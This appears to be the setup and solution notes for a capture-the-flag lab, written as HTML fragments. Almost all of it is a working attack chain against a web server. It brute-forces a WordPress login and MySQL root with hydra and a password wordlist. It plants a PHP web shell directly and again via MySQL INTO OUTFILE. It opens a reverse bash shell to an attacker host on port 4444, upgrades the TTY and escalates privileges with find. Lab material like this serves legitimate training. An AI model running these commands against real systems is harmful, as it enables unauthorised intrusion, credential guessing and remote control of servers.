Start challenge with command: <b> chmod +x ./start-challenge && ./start-challenge ip-machine </b>
port vuln in 80 and 3306 <br>
<b>[+]challenge weak password</b> <br>
<pre>hydra -l admin -P /usr/share/wordlists/rockyou.txt <b>ip-machine-victim</b> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=302"</pre>
<b>[+]challenge file upload (php) with RCE</b> <br>
<pre>
[-] create file php with content system($_POST["cmd"]); and name file is <b>shell.php</b>
[-] php -r '$sock=fsockopen("<b>ip-machine-victim</b>",4444);shell_exec("/bin/bash <&3 >&3 2>&3");'
[-] curl http://ip-machine-victim/shell.php --data-urlencode  "cmd=php -r '\$sock=fsockopen(\"ip-machine-attacker\",4444);shell_exec(\"/bin/bash <&3 >&3 2>&3\");'"
[-] python3 -c 'import pty; pty.spawn("/bin/bash")'
[-] stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
</pre>
<b>[+]challenge mysql db</b> <br>
<pre>
[-] hydra -l root -P /usr/share/wordlists/rockyou.txt <b>ip-machine-victim</b> mysql -I -t64
[-] select 'system($_POST["cmd"]);' into outfile '/var/www/html/shell.php' from mysql.user limit 1;
</pre>
<b>[+]challenge privilege escalation</b> <br>
<pre>find . -exec /bin/sh -p \; -quit</pre>